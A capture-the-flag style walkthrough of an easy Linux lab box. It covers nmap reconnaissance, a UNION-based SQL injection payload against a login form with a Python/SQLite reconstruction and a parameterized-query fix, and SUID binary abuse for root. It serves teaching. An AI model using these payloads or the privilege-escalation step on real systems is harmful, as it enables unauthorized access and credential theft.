
linux, web, sqli

Lab: Example Machine


A walkthrough of the Example lab — SQLi to foothold, then SUID abuse for root.

Overview

Retired lab machine — easy difficulty, Linux target.

IP: 10.10.x.x | OS: Linux | Rating: Easy


Recon

nmap -sV -sC -p- 10.10.x.x -oA scans/initial

Open ports: 22 (SSH), 80 (HTTP).

Figure: initial nmap output showing the two open ports (22 and 80).

Foothold

The login form at /login is vulnerable to UNION-based SQLi: input from the form is built straight into the query, so a UNION can append rows from the users table to the result the application renders.

Payload hint:
' UNION SELECT 1,username,password FROM users-- -

The three columns in the UNION must match the column count of the original SELECT (probe it first with NULL-padded UNIONs or ORDER BY n until the error goes away), and the trailing -- - comments out the rest of the original query.
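The following is an added example, not code from the lab or the original writeup. It reconstructs the bug class with an in-memory SQLite database and a constructed users table (the lab's real schema and column names are an assumption): the vulnerable login pastes form input into the query, the column-count probe finds the three columns the payload needs, the payload dumps every username and password, and the parameterized version treats the same payload as a plain string.

```python
import sqlite3

# Constructed fixture standing in for the lab's backend; table and column
# names are assumptions, not the lab's real schema.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'S3cretAdminPw', 'admin'),
            ('alice', 'alicepw',       'user');
    """)
    return conn

# Vulnerable login: the form fields are concatenated into the SQL text, so a
# quote in the username ends the string and the rest is parsed as SQL.
def login_vulnerable(conn, username, password):
    sql = ("SELECT id, username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()

# Hardened login: bound parameters, so the payload is compared as a literal.
def login_safe(conn, username, password):
    sql = "SELECT id, username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# Column-count probe: pad a UNION with NULLs until the database stops
# complaining about a column mismatch. That number is what the payload must use.
def find_column_count(conn, max_cols=8):
    for n in range(1, max_cols + 1):
        probe = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- -"
        try:
            login_vulnerable(conn, probe, "x")
            return n
        except sqlite3.OperationalError:
            continue
    return None

# The writeup's payload: three columns, matching the original SELECT.
PAYLOAD = "' UNION SELECT 1,username,password FROM users-- -"

if __name__ == "__main__":
    conn = build_db()
    print("columns in original SELECT:", find_column_count(conn))
    print("vulnerable:", login_vulnerable(conn, PAYLOAD, "x"))
    print("parameterized:", login_safe(conn, PAYLOAD, "x"))
```

The second column of each row returned by the vulnerable call is the username and the third is the password, because the UNION maps them onto the username and role positions of the original SELECT; that is why the application's rendering of the result leaks credentials.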

Privilege Escalation

Found a SUID binary at /usr/local/bin/example. GTFOBins has an entry for it.

/usr/local/bin/example -p

Confirm the result with id afterwards: the effective uid should be 0, otherwise the binary dropped privileges before handing over control.
